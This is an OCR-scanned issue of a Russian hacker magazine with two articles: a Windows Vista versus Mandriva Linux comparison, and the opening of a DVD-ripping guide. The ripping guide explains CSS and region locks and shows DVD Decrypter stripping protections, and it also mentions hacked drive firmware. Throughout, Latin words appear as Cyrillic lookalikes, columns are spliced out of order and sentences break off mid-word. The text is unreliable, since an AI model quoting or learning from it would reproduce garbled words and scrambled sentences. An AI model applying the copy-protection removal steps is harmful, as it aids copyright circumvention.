и прочие прелести интерфейса Аего ОІазз 
ЗО, то тебе конечно же придется проапгрей- 
дить компьютер. Ведь возможности системы 
позволяют сделать из рабочего стола нечто 
невообразимое с огромнейшим количес- 
твом всевозможных эффектов! С другой 
стороны, многим пользователям, включая 
меня, все эти графические премудрости, 
мягко говоря, не нужны, а значит в наворо- 



ченной видюхе нет никакой необходимости. 
Получается очень демократичный вариант, 
когда пользователь может выбрать: либо 
использовать потенциал современного 
оборудования и технологий (Нагсіѵѵаге РіхеІ 
Збасіег ѵ2.0 и \АЮОМ), либо комфортно рабо- 
тать без излишних накруток. На стареньком 
Репііит 4 1 ,6 А (разогнан до 2,4) с гигом 
оперативы (с меньшим количеством ОЗУ 
работать сложно даже на ХР) новая Ѵізіа 
работает без скрипа и тормозов. Кто бы 
ни утверждал обратное, знай: проверено в 
лаборатории «X». 



ХАКЕР 12/96/ 06 



/ 037 



ш 








МАМОВІѴАІЛЧІІХ: 

Волноваться нѳ о чем. Когда нужно устано- 
вить І_іпих, ты вообще не задумываешься 
о системных требованиях и тем более не 
проверяешь возможности своего компью- 
тера с помощью специальных программ 
(для Висты такие есть). Все намного проще 
— любой дистрибутив отлично установится 
даже на средненькую машину. За примером 
далеко ходить не надо: Мапбгіѵа 2006 без 



проблем встает на комп с Сеіегоп 733 МГц и 
256 Мб оперативки, причем позволяет более 
или менее комфортно работать, а не только 
установить и созерцать себя. Конечно, для 
полноценной работы и установки всевоз- 
можных фишек интерфейса (ты волен сам 
найти и установить их, а не использовать то, 
что навязывают разработчики системы) пот- 
ребуется машинка помощнее. Но с теми тре- 
бованиями, которые предъявляются ѴѴіпбоѵѵз 



Ѵізіа, никсы уж точно будут работать даже 
без намека на тормоза. Кстати, если в ар- 
сенале есть производительная видеокарта, 
то друзей ты и без винды сможешь удивить 
ЗО-эффектами в интерфейсе, понадобится 
лишь ХдІ ( ѵѵѵѵѵѵ.поѵеіі.сот/ііпих/хаігеіеазе ) 

— специальная архитектура Х-сервера, 
использующая прорисовку ОрепОІ_ для 
создания умопомрачительных эффекты на 
рабочем столе. 



ѴѴ№0ѴѴ5ѴІ5ТА: 

При нынешнем распространении винды 
проблемы с совместимостью исключены в 
принципе. По-другому и быть не может, ведь 



тует свои девайсы с дровами для винды (и 
очень-очень редко для юникса). Мало того, 
в состав самой винды входит нехилый набор 
стандартных драйверов. Если раньше после 



любой производитель непременно комплек- установки ѴѴіпбоѵѵз ХР какие-то драйверы 



приходилось инсталлировать, то теперь 
зачастую все работает по умолчанию. 
Правда размер дистрибутива увеличился и 
составляет сейчас почти 4 Гб, но разве это 
кого-то волнует? 



МАМОВІѴАІЛЧІІХ: 

Мы все привыкли, что в винде действует 
механизм РІид’п’РІау. Он все делает за нас, 
и единственное, что требуется, — это гра- 
мотно подключить устройство и вставить в 
ЭѴЭ-ВОМ диск с драйверами. В І_іпих теперь 
все почти точно так же. При инициализации 
системы запускается программа (в Мапбгіѵа 
— багббгаке2, в РС — кибги), которая уве- 



ренно определяет новые устройства, после 
чего самостоятельно вносит в файл 
/еіс/тобиіез.сопі необходимые записи. 
Напомню, что в этом файле указываются мо- 
дули (ѴѴіпбоѵѵз-пользователям нужно читать 
это слово как «драйверы») устройств, а так- 
же другие необходимые системе библиоте- 
ки. Причем в поставку дистрибутивов входит 
множество готовых модулей, и есть все 



основания полагать, что твой ТѴ-тюнер будет 
правильно определен автоматически. Для 
всех остальных девайсов существуют специ- 
альные конфигураторы, которые в процессе 
своей работы определяют соответствующее 
устройство и устанавливают его в системе. 
Приятно, что в І_іпих сейчас никаких проблем 
с поддержкой и установкой устройств нет. 
Да, они были, но сейчас это в прошлом. 



ѴѴІМР0ѴѴ5 ѴІ5ТА: 

Как и в предыдущих версиях винды, существует 
2 варианта установки: можно воспользоваться 
загрузчиком с ЭѴЭ или же инсталлировать ось 
из-под существующей системы. 



И если в последнем случае ничего кардинально 
не изменилось, то мастер установки системы 
с нуля был полностью переписан. Теперь это 
полноценная графическая система с понятным 
и удобный интерфейсом и подробными ком- 



ментариями, сопровождающими каждый шаг 
пользователя. В общем, проблемы, по-моему, 
исключены. Единственная сложность — дож- 
даться, пока мастер сделает все необходимые 
действия. Здесь комментарии излишни. 



МАЫОРІѴА ІЛѴІІІХ: 

Раньше установить І_іпих на компьютер мог 
только профессионал. Это было во времена, 
когда І_іпих поставлялся на двух дискетах: 
одна с ядром, а другая с корневой файловой 
системой. Появившиеся было дистрибутивы 
не особенно упрощали установку системы. 
Диск по-прежнему приходилось перераз- 



бивать вручную (да, инсталлятор запускал 
для этого ібізк), к тому же переразметка 
диска происходила с потерей данных. 
Сейчас же установить ту же Мапбгіѵа не 
сложнее, а скорее, даже легче, чем ѴѴіпбоѵѵз. 
Вставил диск, перезагрузился в графичес- 
кую оболочку, выбрал язык и раскладку 
клавиатуры, разметил диск и выбрал пакеты 



для установки — уже пол дела сделано. 
Подождал окончания копирования файлов, 
задал несколько параметров — и все, І_іпих 
установлен. Единственный совет: исполь- 
зуй дистрибутивы на ЭѴЭ-дисках, иначе 
успеешь почувствовать себя диджеем, пока 
установщик будет инсталлировать пакеты по 
очереди с 5-6 дисков. 
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> Вот так выглядит рабочим стол КРЕ после установки 
разве не прелесть? 



> Панельуправления: линукс можно полностью отконфигурировать 
с помощью этой удобной графической оболочки 



МУЛЬТИМЕДИА И ИГРЫ 



ѴѴІЫ00ѴѴ5 ѴІ5ТА 



Что бы кто ни говорил, а в плане мультиме- 
дийной станции позиции ѴѴіпбоѵѵз непоколе- 
бимы. В Ѵізіа даже появилась возможность 
управлять системой голосом, не говоря уже 
о таких мелочах, как стандартная програм- 
ма для работы со звуком и записи 0\Ю или 

МАМОВІѴАШиХ: 

Едва ли несколько лет назад І_іпих можно 
было использовать надомашнем компью- 
тере. Виной тому — проблемы с русским, 
отсутствие игр, слабая поддержка звуко- 
вых плат. Чего там говорить, если даже 
просмотр видео зачастую оказывался 
невыполнимой задачей: то звука нет, то вы- 



* 4 



БЕЗОПАСНОСТЬ 



ѴѴІЫООѴѴЗ ѴІЗТА: 

Никто не спорит, что в винде подцепить троян 
или малварь довольно просто. Но просто 
только тогда, когда ты напрочь забываешь 
о заплатках для системы и браузера. Если 
ты устанавливаешь все обновления и не 
поддаешься соблазну запустить пришед- 
ший по почте исполняемый файл, риск 
подцепить заразу сводится практически 
к нулю. Но чтобы еще надежнее оградить 



улучшенная панель управления звуком с 
реализованной фичей изменения громкости 
как для всей системы, так и для каждого 
приложения в отдельности. ОігесіХ 1 0, раз- 
работанный специально для Ѵізіа, включает 
в себя столько инноваций, что одной статьи 
не хватит, чтобы даже коротко пробежаться 



летает нужных кодек. Но сейчас, особенно 
в последних дистрибутивах, с мультимедиа 
полный порядок. Определяются все видео- и 
звуковые платы, удобные проигрыватели, 
проблем с кодеками нет. Помню, в ѴѴіпбоѵѵз 
не мог посмотреть фильм: было изоб- 
ражение, но не было звука, а в І_іпих все 
нормально! В состав дистрибутивов входят 



по ним. Однако обещанное увеличение 
производительности в 6 раз мы сможем 
ощутить лишь в приложениях и девайсах, 
адаптированных под новую версию графи- 
ческого АРІ. Но все тестируемые игрушки, в 
том числе ІМееб Іог Зрееб: СагЬоп, работают 
в Висте на ура. 



проигрыватели, позволяющие воспроиз- 
водить форматы 0\Ю, АибіоСО, ѴСО, МР4, 
МРЗ, ООО, ѴѴАѴ и т.д. Правда вот с играми 
по-прежнему беда: портированных версий, 
естественно, нет и даже эмуляторы, вроде 
ѴѴіпеХ, не помогают. Сдаюсь. При всем ува- 
жении к Ыпих, если хочется поиграть, лучше 
запустить игры в ѴѴіпбоѵѵз. 



пользователя от подобных проблем, МісгозоЙ 
разработала сразу нескольких систем, в 
частности защищенный режим просмотра 
веб-страниц, который предотвращает доступ 
веб-приложений к различным областям 
системной памяти. Сам браузер, как и другие 
приложения, благодаря механизму ІІАС не 
запускается с правами администратора и 
имеет ограниченные возможности в системе 
(а следовательно, и использующие их экс- 



плоиты — тоже). Всевозможные виды атак, 
такие как, например, переполнение буфера, 
осуществить в Ѵізіа станет существенно 
сложнее из-за технологии случайного разме- 
щения кода в адресном пространстве (АЗІ_П, 
Аббгезз Зрасе І_ауои{ Рапботігаііоп). Кстати, 
в случае сбоя или какой-либо непредвиден- 
ной ситуации, поможет уже не неказистая 
консоль восстановления, а специальный 
мастер с графическим интерфейсом! 



МАМБРІѴА ІЛѵІІІХ: 

В Мапбгіѵа, как и в любой ипіх-системе, 
проблем с вирусами не существует в 
принципе! И все потому, что этих самых ви- 
русов попросту нет. Вернее, они, конечно 
же, есть, но их ничтожно мало в сравнении 
с количеством заразы, которая распро- 
страняется в уютных условиях ѴѴіпбоѵѵз. 



А знаешь, почему так мало вирусов? Да 
потому, что писать вирусы под І_іпих не 
интересно. Предположим, что во время 
прогулки вирус из Сети проник в твой 
компьютер. И что он может сделать? Да 
практически ничего. Потому что у него нет 
прав гооі, у него не достаточно полномо- 
чий, которые бы позволили нанести вред 



системе. Да, есть определенные техно- 
логии получения прав гооі, но почти все 
они основаны на так называемых дырах 
в сетевых сервисах (вроде ошибки пере- 
полнения буфера) и актуальны скорее 
для серверов, нежели чем для рабочих 
станций. А в случае сервера необходимо 
устанавливать обновления. 
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> Файрвол в Висте не только стал функциональным, но еще и удобно 
. -конфигурируется через консоль ММС 



> Ѵѵіпаоѵѵз Ѵізіа и ее Аего — интерфейс 






удобство интерфейса 



ѴѴІШ0ѴѴ5ѴІ5ТА: 

Чтобы долго нѳ разглагольствовать о 
красоте нового интерфейса, скажу одно: 
очень круто и впечатляюще. Но помимо 
грандиозных наработок в плане графики 
и внешнего вида, отличающих ѴѴіпсІоѵѵз 
Ѵізіа, в ней стало действительно удобнее 
работать. Меню «Пуск» комфортно, даже 
если в системе установлено 200 программ. 



Быстрый поиск теперь возможен по всей 
системе сразу, что, в частности, является 
одним из главных нововведений нового шел- 
ла системы, позволяющим быстро находить 
нужные документы. А новый эксплорер дает 
возможность работать с файлами и папками 
на виртуальном уровне и поддерживает 
систему символических ссылок. Особенно 
хочу отметить такой элемент интерфей- 



са, как ѴѴіпсІоѵѵз ЗісІеВаг. Известная еще 
по бета-версии панель имеет довольно 
скромные возможности, но они значитель- 
но расширяются с помощью специальных 
скриптов-гаджетов, которые свободно пе- 
ремещаются по десктопу и могут выполнять 
самые разнообразные функции, например 
отображать прогноз погоды или качество 
сетевого соединения. 



МАМБРІѴА І-ІМІІХ: 

Неудобно работать в никсах может быть 
лишь по одной причине — из-за привычки 
к интерфейсу ѴѴіпсІоѵѵз. Но стоит недельку 
посидеть под тем же КОЕ (другая графическая 
оболочка — (ЗІЧОМЕ — также неплоха, но я ее 
не использую), как тебе раскрываются все его 
прелести. Красивые формы; замечательные 



шрифты; множество визуальных эффектов, 
которые, кстати, каки в ѴѴіпсІоѵѵз, можно от- 
ключить на медленных компьютерах. Словом, 
смотрится новый КОЕ (а именно им комплек- 
туется Мапбгіѵа по умолчанию) очень и очень 
симпатично. Что особенно меня прельщает, 
так это виртуальные рабочие столы, позво- 
ляющие моментально навести порядок на 



экране. Открыто много окон, которые нельзя 
закрыть, и в то же время они мешают работать 
и даже думать? Просто можно переключиться 
надругой рабочий стол. И полный порядок! 
Куда там Висте с ее единственным рабочим 
столом ! А что касается ЗібеВаг’а, то эта фиш- 
ка была реализована еще в первой версии 
КОЕ, то есть задолго до выхода ѴѴіпсІоѵѵз ХР. . . 



ѴѴЮ0ѴѴ5ѴІ5ТА: 

Настроить сеть — задача подчас сложная 
даже для опытных пользователей. Бывает, на- 
строишь все как надо, и вроде бы уже должно 
заработать, ан нет — пинги не идут, компьюте- 
ры в сетевом окружении не появляются. Зато 
ѴѴіпсІоѵѵз Ѵізіа знает, в чем проблема, и, скорее 
всего, даже поможет ее решить. Благодаря 
специальному мастеру в ІМеіѵѵогк Сепіег ты 
под чутким руководством сможешь не только 



настроить сеть, но и выявить возможные 
неисправности. Конечно, это не вариант для 
крупных корпоративных сетей, но для домаш- 
ней локалки — настоящая находка. Любого 
сетевика не оставит равнодушным встроен- 
ный файрвол для фильтрования входящего и 
исходящего трафика. Это уже по-настоящему 
продуманный продукт, с управлением через 
стандартную консоль ММС, предоставляю- 
щую массу возможностей, в том числе сохра- 



нение профилей для разных пользователей и 
разных сетей (кстати говоря, в любых панелях 
для настройки соединений ты найдешь опции, 
актуальные для ІРѵб). Касательно беспро- 
водных соединений — опять же улучшения: 
ѴѴіпсІоѵѵз больше не пытается автоматически 
подключиться к самой мощной сети, даже 
если она совсем чужая. Теперь все грамотно 
разруливается с помощью профилей. Без 
проблем работает и Ыиеіооііт. 



МАМОШѴАШІІХ: 

В І_іпих такого мастера по поиску про- 
блем я, к сожалению, не видел. С одной 
стороны, к сожалению, а с другой, в І_іпих 
просто такая функция не нужна. ѴѴіпсІоѵѵз, 
в основном, рассчитана на не очень ква- 
лифицированных пользователей. Ыпихже 
подразумевает, что пользователь, рабо- 
тающий за компьютером, более или менее 
квалифицирован. Да и никакая программа 
не сможет определить, например, что 



седьмой провод витой пары плохо обжат и 
из-за этого ничего не работает. . . Настрой- 
ка же сети (и интернета) в І_іпих с помощью 
графических конфигураторов не вызывает 
никаких нареканий — лишь бы пользова- 
тель, работающий за компьютером, знал 
параметры сети. Это касается и беспро- 
водных сетей, а также ЫиеіооіИ-устройств 
(поддержка синего зуба вообще встроена 
в ядро по умолчанию в виде программного 
стека Ыиег). І_іпих может похвастаться 



удобной программой для настройки файр- 
вола. Ты вот сможешь в ѴѴіпсІоѵѵз ограни- 
чить число пакетов, присылаемых узлом 
с МАС-адресом 1 1 :1 2:13:14:15:16, — не 
более 10 пакетов в минуту? Или сделать 
то же самое, но только для определенного 
приложения? В І_іпих это реализуемо за 
считанные минуты. А что касается ІРѵб 
— нашел, чем удивить: поддержка этой 
версии протокола появилась еще с релиза 
суперсервера хіпеісі. 
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ДЖЕНТЛЬМЕНСКИЙ НАБОР СОФТА 



ѴѴІЫ00ѴѴ5ѴІ5ТА: 

Місгозоіі сделала бы огромную ошибку, нару- 
шив совместимость со старыми приложени- 
ями. Опасения по поводу серьезно изменив- 
шегося ядра оставались до конца. Впрочем, 



они не подтвердились. Почти все приложения 
из моего джентльменского набора отлично 
установились и корректно работают в новой 
системе, за исключением разве что неко- 
торых антивирусов и файрволов, которые 



МАМОВІѴАІЛЧІІХ: 

Для любой ѴѴіпбоѵѵз-программы, которую ты 
юзаешь, совершенно точно есть свой І_іпих- 
аналог. Причем даже не один, а несколько. 
Поэтому ты сможешь не только найти альтерна- 
тиву, которая, не в пример ѴѴіпбоѵѵз-приложе- 
ниям, будет бесплатна, но еще и выбрать то, что 
тебе больше всего нравится. Наша подборка 



ипіх-софта на ЭѴЭ — тому подтверждение. Для 
никсов разработано абсолютно все необходи- 
мое, и если ты по-прежнему живешь старыми 
стереотипами, смотри ѵѵѵмѵ.Ііпихгзр.ги/ѵѵіп-Ііп- 
зоМаЫе-гиз.ИітІ. 

. Кстати, многие до сих пор полагают, что они не 
в силах установить нужный пакет под никсами, 
и даже не подозревают, насколько это теперь 




БЫСТРОДЕЙСТВИЕ 



ѴѴІМ00ѴѴ5ѴІ5ТА: 

Несмотря на наезды по поводу тормозов, 
можно сказать, что многое в ѴѴіпбоѵѵз Ѵізіа 
работает заметно быстрее. То же самое 
включение и выключение теперь осуществля- 
ются практически мгновенно благодаря тому, 
что система не отключается полностью, а 
переходит в специальный хитрый режим сна. 



Щелкнул кнопку выключения — система тут 
же отключилась, щелкнул еще раз — и через 
мгновение можешь продолжать работу. Но 
это еще не все. Интеллектуальная техноло- 
гия ЗирегРеісН особым образом управляет 
памятью, отслеживая часто используемые 
приложения. Определив закономерности в 
работе пользователя, она начинает работать 
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активно используют системные АРІ-вызовы. 
Разработчикам этих программ придется 
внести некоторые коррективы. В остальном 
же никаких изменений — любое приложение, 
как и прежде, установит даже ребенок. 



просто. В современных версиях І_іпих использу- 
ются умные менеджеры пакетов, учитывающие 
зависимости между различными програм- 
мами, атакжеутилиты ѴА5Т иАРТ, которые 
существенно облегчают процесс установки и 
обновления софта. Скачав ВРМ-пакет(в случае 
Мапбгіѵа, Визе, Ребога Соге), ты установишь 
прогу с помощью нескольких щелчков мыши. 



ьГЪ ші 



«а 






на опережение, заранее подгружая в память 
нужные приложения и тем самым ускоряя 
их запуск. Хорошо показала себя и фишка 
ВеабуВоозі, которая создает дополнитель- 
ный кэш на внешних ІІЗВ-носителях. Пос- 
ледние работают заметно быстрее, нежели 
обычный жесткий диск, поэтому такой подход 
намного эффективнее обычного зѵѵар’а. 



МАМБРІѴАІЛЧІІХ: 

А у нас свой ответ — отличная файловая 
система ЯеізегРЗ, у которой есть одно 
неоспоримое преимущество (в то время как 
запланированная в винде ѴѴіпРЗ так и не будет 
воплощена в жизнь). Онахранит несколько 



мелких файлов в одном блоке. Эта особен- 
ность называется ТаіІ Раскіпд. ТаіІ («хвост») 

— это небольшие файлы, размер которых 
меньше логического блока, или остатки более 
крупных файлов. Благодаря подобному под- 
ходу РеізегРЗ позволяет экономить дисковое 



пространство и в то же время обеспечивает 
высокую производительность. Да и вообще, 
система изначально сбалансирована так, 
чтобы разработчикам не приходилось ломать 
голову и прибегать к всевозможным ухищре- 
ниям для увеличения производительности. 






А ЧТО ЖЕ ВЫБРАТЬ?! 



Каждая из представленных систем имеет свои преимущества, поэтому глупо рекомендовать тебе что-то одно. Большинству пользователей, 
конечно, роднее будет ѴѴіпбоѵѵз Ѵізіа, в которой они найдут привычные приложения, обновленный, но знакомый интерфейс и высокую стабиль- 
ность. Но мы искренне надеемся, что и Мапбгіѵа не останется без внимания. В конце концов, ты можешь опробовать ее в действии бесплатно и 
сам решить: нужно тебе оно и нет. Но будь уверен: во многом она не только не ниже, но даже выше сверхсовременной разработки от МісгозоЙ! : 
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КРИС КАСПЕРСКИ 



ДЛЯ ХОРОШЕГО ПРОСМОТРА МАЛО ХОРОШЕГО ФИЛЬМА. НА ВЫСОТЕ ДОЛЖНЫ БЫТЬ КАРТИНА И ЗВУК. НО ЧТО МЫ 
ЧАС? ВСЕ, ЧТО ВАЛЯЕТСЯ В СЕТИ, - ЭТО ОГРОМНОЕ КОЛИЧЕСТВО КРИВЫХ ОѴЬ-РІР'ОВ, СОЗДАННЫХ НЕПРОФЕССИоШШрЦ 
НА КОТОРЫЕ СЛОЖНО СМОТРЕТЬ БЕЗ ОТВРАЩЕНИЯ. А ВСЕ ПОТОМУ, ЧТО СПЛОШЬ И РЯДОМ ИСПОЛЬЗУЮТСЯ ПОЛ НО СТБЮ АВТО- 
МАТИЧЕСКИЕ РІРЕР'Ы С УРОВНЕМ ИНТЕЛЛЕКТА НЕ ВЫШЕ, ЧЕМ У ДОЖДЕВОГО ЧЕРВЯ. ПРАВИЛЬНЫЙ РІР - ОЧЕНЬ СЕРЬЕЗНОЕ 



ДЕЛО, И ДОВЕРЯТЬ ЕГО АВТОМАТИКЕ НИВ КОЕМ СЛУЧАЕ НЕЛЬЗЯ! 



ІЦели и задачи гір'а 



авай разберемся, а зачем вооб- 
ще нужно делать гір’ы дисков? 

Во времена, когда 0\Ю-привод 
считался предметом роскоши, 
другого выхода просто не было. Но сейчас, 
когда резак есть в каждом доме, а стоимость 
ОѴО-болванки (за исключением двухслоек) 
вплотную приблизилась к стоимости обыч- 
ной СО, имеет ли смысл вообще тратить 
время на оцифровку дисков? Не лучше ли 
воспользоваться тем же СІопеОѴО и пере- 
копировать 0\Ю, взятый на прокат, один 
к одному, сохранив исходное качество и 
прочие прилагающие к 0\Ю бонусы? Лучше, 
если речь идет о десятке дисков. Но по мере 
роста домашней ОѴО-коллекции находить 
нужные фильмы становится все сложнее и 
сложнее (моя личная фильмотека насчиты- 
вает свыше тысячи дисков, рассованных во 
всем углам). Г ораздо удобнее держать все 
это хозяйство на винчестере (тем более что 
жесткий диск размером 500 Г б уже не рос- 
кошь). А сколько дисков утекло со словами: 



«Дай посмотреть на пару дней, верну», не 
каждый и сосчитает! Кроме того, после рипа 
можно избавиться от такой напасти, как 
непропускаемая реклама. Так что рипать, 
то есть перегонять содержимое 0\Ю на 
жесткий диск или любой другой носитель, 
все равно приходится. Но содержимое 0\Ю- 
9 в «естественном» виде занимает порядка 
8,5 Гб — тут никаких жестких дисков не 
хватит, не говоря уже о том, что ѴѴіпсІоѵѵз 
9х (которая еще жива) не поддерживает 
работу с файлами свыше 2 Гб. Чтобы там ни 
говорили, фраза «размер имеет значение» 
актуальна всегда и везде. Падение качества 
при сжатии (если не пихать по 2 фильма на 
один СО) не столь существенно, и, если не 
учитывать воинствующих эстетов, в целом 
народные массы вполне удовлетворены 
тем результатом, который дает ОіѵХ. Кстати 
говоря, «ОѴО-качество» — это не более 
чем маркетинговая уловка, и на ОѴО-дисках 
распространяется огромное количество ли- 
цензионных фильмов, в отношении которых 
о качестве говорить просто некорректно и 



при сжатии которых мы вообще ничего не 
теряем! Что еще более важно, перегон 0\Ю 
на АѴІ дает большую свободу в выборе виде- 
оплееров, возможность подключения вне- 
шних субтитров, легкость нарезки фильмов 
на отдельные «клипы» — короче, предостав- 
ляет большие удобства и возможности по 
использованию медиапродукции. Особенно 
это актуально, когда фильмы используются 
для изучения английского. Без внешних 
(текстовых) субтитров, без опции зацикли- 
вания диалогов (с первого и даже второго 
раза не все удается расслышать), без 
эквалайзера, улучшающего разборчивость 
речи, без режима замедления речи на 10%, 
20%, 30% (именно речи, а не изображения) 
освоение английского существенно ослож- 
няется. Из всех известных мне ОѴО-плееров 
такими возможностями не обладает ни один ! 
А вот АѴІ-плееры — ВРЬАУ и 5иЬ-ѴѴогкзИор 
— с этой задачей справляются вполне! 
Короче, не будем философствовать о том, 
быть рипу или не быть, а лучше покажем, как 
этот самый рип правильно осуществить. 
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> Отделение звука от изображения 



ЭТАП № О 



Введение в ОѴО 



Стандарты предоставляют возможность 
шифрования ЭѴЭ-содержимого с исполь- 
зованием трех зависящих друг от друга 
ключей. Один из них хранится в специальной 
служебной области, не доступной для про- 
жига ЭѴЭ-рекордерам, что делает невоз- 
можным «сквозное» копирование ОѴО без 
их предварительной расшифровки. Другой 
ключ (точнее, список ключей) хранится внутри 
ЭѴЭ-плеера (как аппаратного, так и програм- 
много) в открытом виде. Это и есть та причина, 
по которой создание ореп зоигсе ЭѴЭ-плеера 
невозможно. Список ключей, являясь объек- 
том авторского права, не может быть исполь- 
зован без лицензионных отчислений, а сам 
плеер должен в обязательном порядке пройти 
процедуру сертификации, подтверждающую, 
в частности, что он не позволяет обходить 
неотключаемую рекламу или сохранять рас- 
шифрованное содержимое на диск. Третий 
ключ генерируется на основе первых двух и 
им-то уже и расшифровывается контент. 
Сразу же после публикации черновых 
стандартов на ЭѴЭ множество криптоана- 
литиков заявило о ненадежности защиты. И 
действительно, через некоторое время она 
была успешно взломана норвежским хакером 
Йоном Йохансеном фоп ^Напзеп), известным 
под кличкой ЭѴЭ 4оп, создателем легендар- 
ной утилиты ЭеСЗЗ (С88 — Сопіепі ЗсгаЬЫіпд 
Зузіет, «Система скремблирования контен- 
та» — официальное название ЭѴЭ-защиты, 
а приставка «Эе», как нетрудно сообразить, 
означает ее снятие). Причем ЭеСЗЗ предна- 
значалась вовсе не для несанкционирован- 
ного копирования ЭѴЭ, а для «легального» 
просмотра ЭѴЭ на Ыпих-системах. Тем не 
менее, видеостудии не на шутку возмутились 
и устроили громкий судебный процесс, бла- 
годаря которому широкие массы узнали, что 
копировать ЭѴЭ все-таки можно. После этого 
усовершенствованные клоны ЭеСЗЗ пошли 
косяками, и никакая сила в мире уже не могла 
остановить их распространение. 

Таким образом, все, что нам нужно для 
расшифровки ЭѴЭ, — это считать первый 
ключ из служебной области диска, воткнуть 
его в ключ из статичного списка «секретных» 



ключей и сгенерировать финальный ключ. 
Просто? В реальной жизни все еще проще, и 
большинство дисков (в том числе и лицен- 
зионных), продаваемых в России, несет на 
своем борту незашифрованный контент. 
Другой камень преткновения — так назы- 
ваемая региональная защита. Чтобы иметь 
возможность продавать один и тот же диск в 
США и Канаде раз в 1 0 дороже, чем в России 
и ЮАР, весь мир был разбит на 6 зон. Номер 
зоны в явном виде прописывается на диске, и 
привод, прежде чем начать выдавать содер- 
жимое, должен на аппаратном уровне удос- 
товериться, что номер его зоны совпадает с 
кодом ЭѴЭ-диска. По спецификациям, номер 
зоны привода можно менять всего лишь 5 раз 
(он хранится в энергонезависимой памяти), 
после чего он навечно замораживается и. . . тут 
начинается самое интересное. Заказав ЭѴЭ- 
диск с фильмом через ѵѵѵѵѵѵ.атагоп.сот . мы 
не получаем никаких гарантий, что его удастся 
прочитать на ЭѴЭ-приводе, купленном в 
России. Необходимо либо иметь несколько 
приводов, настроенных на разные зоны (что 
по нынешним временам не такая уж и большая 
роскошь), либо дожидаться, пока фильм 
выйдет в отечественный прокат. Как вариант, 
можно приобрети мультизональный привод, 
выпущенный дружественными нам китайцами 
и читающий все без разбора. Однако Ріопег'ы 
и другие бренды в своем подавляющем боль- 
шинстве ЭѴЭ-стандартам все-таки придер- 
живаются, и тут только один путь — менять 
прошивку. Существует множество хакерских 
прошивок, либо превращающих привод в 
мультизональный, либо блокирующих счетчик 
смены номеров зоны. Естественно, при этом 
существует вероятность угробить привод без 
всяких надежд на его восстановление (не все 
хакерские прошивки совместимы), поэтому 
это дело лучше доверить мастеру, который 
наверняка найдется в любом, даже самом 
маленьком, городе. 

Открыв ЭѴЭ-диск в ГАВ'е или другом нави- 
гаторе, мы увидим папку ѴЮЕО_Т8, а в ней 
— файлы с расширениями іГэ (меню), Ьир 
(резервная копия меню) и ѵоЬ (видео в фор- 
мате МРЕ02, одну или несколько звуковых 
дорожек в форматах МР1 , МР2, М1 V, М2Ѵ, 
МРѴ, ѴѴАѴ, МРА, АСЗ (встречается чаще 
всего) и опционально субтитры на разных 



языках). ѴОВ-файлов в 99% случаев бывает 
несколько. Даже если реклама и прочая муть 
уже была заботливо вырезана пиратами, раз- 
мер одного ѴОВ-файла по стандарту не может 
превышать 2 Гб, а ЭѴЭ-диск вмещает в себя 
от 4,7 Гб (ЭѴЭ-5) до 8,5 Г б (ЭѴЭ-9) данных, так 
что от разрезания ѴОВ'ов никуда не уйти. 

Вот тот минимум информации, которой дол- 
жен располагать каждый начинающий рипер. 



ЭТАП № 1 



ІПерегон фильмов на жесткий дисі 



Из сказанного выше становится понятно, 
почему непосредственно скопировать ЭѴЭ- 
диск на винчестер и проиграть его своим 
любимым видеоплеером нельзя, а точнее, 
просто не получится. Даже если МРЕѲ2-кодек 
установлен, а ЭѴЭ не зашифрован, плеер 
еще должен понимать ѴОВ-формат, в котором 
звук, видео и субтитры — все смешано в кучу. 
Значит, нам нужен инструмент, способный 
создавать ЭѴЭ-образ, перевариваемый 
видеоредакторами и прочими вспомогатель- 
ными программами. 

Лучше всех себя зарекомендовал ЭѴЭ 
Эесгуріег, который имеет столь широкие воз- 
можности, что для их описания потребовалась 
бы целая книга, и при этом продолжает совер- 
шенствоваться. Помимо расшифровки ЭѴЭ 
и создания съедобных образов, он автома- 
тически снимает практически все известные 
защитные механизмы, умеет копировать ЭѴЭ 
в режиме 1 : 1 и делает массу других полезных 
вещей (например, умеет находить в Сети хак- 
нутые прошивки и заливать их в привод). И все 
это абсолютно бесплатно — ѵѵѵѵѵѵ.сІоотЭ.ога/ 
ЗоЙ21/Віррегз . 

Вставляем ЭѴЭ-диск в привод, запускаем 
ЭѴЭ Эесгуріег, в ниспадающем боксе зоигсе 
(источник) выбираем букву ЭѴЭ-привода (в 
данном случае «О:») и тут же переводим ЭѴЭ 
Эесгуріег в ІГО-режим нажатием клавиши <І> 
(или через меню Мобе/ІГО). Это тот режим, 
с которым работает большинство нужных 
нам утилит видеомонтажа и грабежа. В поле 
сіезііпаііоп (пункт назначения) выбираем целе- 
вую директорию, куда будет складироваться 
все награбленное добро. Для рипа ЭѴЭ-5 
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> Выбираем в РУР Оесгуріег, что грабить и куда 



> Содержимое типичного РУР-диска 



необходимо иметь как минимум 1 0 Гб 
свободного пространства, а для 0\Ю-9 и 
того больше, так что просторный винчестер 
отнюдь не помешает. 

Ниже источника отображается сводная 
информация: І_АВЕІ_ (метка диска), на «не 
кривых» 0\Ю совпадающая с оригиналь- 
ным названием фильма, в данном случае 

— N АН О N АІ__ТН ЕА5 II В Е ; Редіоп (региональ- 
ная защита), в данном случае — 2 (Европа) и 5 
(Россия); и другие типы имеющихся защит, в 
данном случае — С38/СРРМ. По поводу защит 
можно не волноваться — они будут отломаны 
автоматически, пока мы курим. 

В закладке Іприі отмечаем файлы, которые 
собираемся рипать. Обычно 0\Ю Оесгуріег 
делает это сам, автоматически выбирая РОС 
(Ргодгат СНаіп) с наибольшей продолжитель- 
ностью, которая отмечается здесь же в часах, 
минутах и секундах. Здесь она равна 02:05:43. 
Если это не фильм, то что же?! 

Теперь переходим к закладке зігеапп 
ргосеззіпд («обработка потоков»), В потоках 
находится все — видео, звуковые дорож- 
ки и субтитры. Ну, все нам явно не нужно. 
Ставим галочку на епаЫе зігеат ргосеззіпд 
(«разрешить обработку потоков») и снимаем 
галочки со всего лишнего (при этом радио- 
кнопка зігеат должна находится в позиции 
бігесі зігеат сору — «прямое потоковое 
копирование»). В первую очередь в корзину 
летят субтитры недружественных нам стран 
(типа турецких). Русские и английские суб- 
титры оставляются, по усмотрению рипера. 
При рипе они сохраняются отдельно и не 
включаются в основной видеопоток, но в 
любой момент могут быть подключены самим 
видеоплеером или через специальный 
ОігесІ-ЗІтоѵѵ-фильтр. 

Звуковых дорожек обычно бывает несколько 

— в разных языках и форматах. Из форматов 
чаще всего встречается АСЗ, а из языков 

— оригинальный английский (если повезет) и 
русский «загробный», с прищепкой наносу. 
Лично я предпочитаю смотреть фильмы в 
оригинале, поэтому обычно оставляю всего 
